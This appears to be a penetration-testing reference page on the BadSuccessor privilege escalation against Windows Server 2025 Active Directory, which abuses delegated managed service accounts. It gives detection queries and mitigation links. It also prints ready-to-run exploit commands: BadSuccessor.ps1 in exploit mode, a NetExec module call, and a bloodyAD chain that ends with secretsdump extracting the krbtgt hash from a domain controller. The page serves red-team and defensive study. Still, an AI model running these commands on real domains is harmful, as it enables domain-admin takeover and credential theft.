dMSA - Windows Server 2025

Managed Service Accounts (dMSAs) - BadSuccessor Exploit

Delegated Managed Service Accounts (dMSAs) is a new feature introduced in Windows Server 2025.

dMSAs are designed to streamline the management of service accounts by allowing a new dMSA to inherit permissions from an older account it replaces

BadSuccessor

Target domain must have at least one Windows Server 2025 Domain Controller

Attackers can simulate this migration by simply modifying two attributes on a dMSA object: msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState. By setting the first attribute to reference a target user and the second to “2” (indicating migration completion), an attacker can trick the system into believing a legitimate migration occurred.

Automatically gain all the permissions of the targeted user, including highly privileged accounts like Domain Admins. Crucially, this attack doesn’t require any direct permissions on the targeted user’s account itself, only the ability to create or control a dMSA.

BadSuccessor: Abusing dMSA to Escalate Privileges in Active DirectoryAkamai Technologies

Detection

Requirements: Windows Server 2025 DC + CreateChild on any OU

Windows Server 2025

Verify whether the DC is Windows Server 2025

LDAPSearch

ldapsearch "(&(objectClass=computer)(primaryGroupID=516))" dn,name,operatingsystem

BloodHound Cypher Query

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1[.]name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2[.]name IN dcs) RETURN c2[.]name

https://x.com/badsectorlabs/status/1925229491607023702

MATCH (c:Computer)
WHERE c.isdc = true AND c.operatingsystem CONTAINS "2025"
RETURN c.name

CreateChild permission on any OU

BloodHound

MATCH (u:User {name: "USERNAME@DOMAIN.LOCAL"})-[r]->(ou:OU)
RETURN type(r) AS edge_type, r.rightname AS permission, ou.name AS organizational_unit

PowerView

Get-DomainObjectACL -Identity "OU=GroupName,DC=DOMAIN,DC=local" -ResolveGUIDs -Where 'AccessMask contains CreateChild' -Where 'SecurityIdentifier contains username'

BadSuccessor.ps1

Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-CollectionGitHub

BadSuccessor -mode check -Domain evilcorp.local 

BadSuccessor -mode exploit -Path "CN=Users,DC=otrf,DC=local" -Name "sus_dMSA" -DelegatedAdmin "j.taylor" -DelegateTarget "svcAccount06" -domain "otrf.local"

BadSuccessor

Identify which identities have permissions to create dMSAs in the domain, and which OUs are affected - highlighting where the BadSuccessor attack could be executed

GitHub - akamai/BadSuccessorGitHub

Proof of Concept (Poc)

NetExec

nxc ldap [IP] -u administrator -p password -M badsuccessor

https://x.com/mpgn_x64/status/1925935365744951350

Rubeus

Support Delegated Managed Service Account Kerberos Processes by JoeDibley · Pull Request #194 · GhostPack/RubeusGitHub

SharpSuccessor - .NET

GitHub - logangoins/SharpSuccessor: SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.GitHub

BadSuccessor - Powershell

Pentest-Tools-Collection/tools/ActiveDirectory/BadSuccessor.ps1 at main · LuemmelSec/Pentest-Tools-CollectionGitHub

PowerView.py dev branch - Python

GitHub - aniqfakhrul/powerview.py at devGitHub

Operationalizing the BadSuccessor: Abusing dMSA for Domain Privilege EscalationSEERcurity Spotlight

BadSuccessor - Python

GitHub - cybrly/badsuccessorGitHub

BloodyAD - Python

Release v2.1.14 · CravateRouge/bloodyADGitHub

$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' get writable --otype OU --right CHILD
$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' get writable --otype OU
$ python bloodyAD.py --host 192.168.100.5 -d blood.corp -u jeanne -p 'Password123!' add badSuccessir dmsADM10
$ export KRB5CCNAME=dmsADM10_wT.ccache
$ secretsdump.py 'bloody.corp/dmsADM10$@DC2025.bloody.corp' -k -no-pass -just-dc -user bloody\\krbtgt -dc-ip 192.18.100.5 -target-ip 192.168.100.5

Mitigation

Understanding & Mitigating BadSuccessor - SpecterOpsSpecterOps

Detecting BadSuccessor: Shorcut to Domain AdminMehmet Ergene

• Set 3 deny ACEs on OUs to prevent DMSA abuse.

GitHub - JimSycurity/dMSAs: Exploring Delegated Managed Service AccountsGitHub

• Disable Implicit Owner Rights

KB5008383—Active Directory permissions updates (CVE-2021-42291) - Microsoft Support

• Don’t have a KDS Root Key - Check for KDS

Get-KdsRootKey (Kds)MicrosoftLearn

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Pentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations

• Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.

• RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command

• Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.

• Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.